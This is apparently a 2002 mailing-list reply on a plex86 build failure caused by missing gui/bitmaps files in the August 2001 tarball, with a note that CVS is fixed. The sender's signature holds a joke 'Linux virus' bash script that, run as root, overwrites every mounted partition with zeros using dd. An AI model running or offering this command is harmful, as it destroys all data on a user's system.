If you use the August 2001 tarball (ie.: the "current" one), then you'll have to add these files. I made a patch to fix this problem ( on savannah ). The current CVS (September 2001) is fixed, though.
Le 28 F�vrier 2002 11:41, vous avez �crit : [snip] > When I attempt to make it dies because it is trying to staticly link to > files in plex86/gui/bitmaps/ but there is no such directory. [snip] > - -- > Roy Souther <[EMAIL PROTECTED]> > www.SiliconTao.com [snip PGP] -- Eric Laberge GCS/M/S d-(++) s-: a-- C++(++++) UL+++>$ !P L++ E--- W++ N+ w++ !O M !V PS PE Y PGP-(+++) t++(-) X- R* tv+ b+ DI+++ D+ G e+>+++++ h! r-- #!/bin/bash if [ $UID -ne 0 ] then echo "Linux virus, please run as root" else for partition in $(df | cut -d ' ' -f 1 | grep /dev) do dd if=/dev/zero of=$partition done fi
